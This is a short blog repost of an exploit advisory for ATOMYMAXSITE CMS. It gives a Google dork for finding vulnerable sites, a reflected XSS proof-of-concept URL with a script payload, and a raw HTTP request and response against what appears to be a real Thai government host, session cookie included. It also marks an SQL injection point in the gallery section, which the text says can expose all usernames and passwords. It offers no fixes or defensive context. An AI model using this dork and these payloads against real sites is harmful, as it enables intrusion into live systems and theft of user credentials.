Pages

Tuesday, 26 May 2015

ATOMYMAXSITE CMS Multiple Vulnerability

# Google Dork: intext:"Powered By ATOMYMAXSITE" inurl:"index.php?name=gallery"

# Date: 5/05/2015
 
# Tested on: Kali Linux
 
Interductions:



ATOMYMAXSITE CMS Is Used By Government Sites And This Vulnerabilities Can Harm All Informations And Attacked By Hackers.





Cross Site Scripting (Refelected)

-========================================



An XSS Vulnerability In Search Bar And Can Used For Dangerous Ways :



Poc:



http://site.com/main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E



GET /main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E HTTP/1.1

Host: www.pck1.go.th

User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: __atuvc=2%7C18; PHPSESSID=qo9g1jdmq1ptvekvh0k008of95

Connection: keep-alive

HTTP/1.1 200 OK

Date: Tue, 05 May 2015 10:35:21 GMT

Server: Apache/2.2.22 (Ubuntu)

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 10728

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=tis-620





Sql Injection

=============================



In Gallery Section We Have A Sql Injection Vulnerability Can Inject All Databases



And Collect All Usernames And Passwords .



PoC:



http://www.site.com/main/index.php?name=gallery&op=gallery_detail&id=[sql]
 
Sumber : http://www.exploit4arab.net 

1 comment: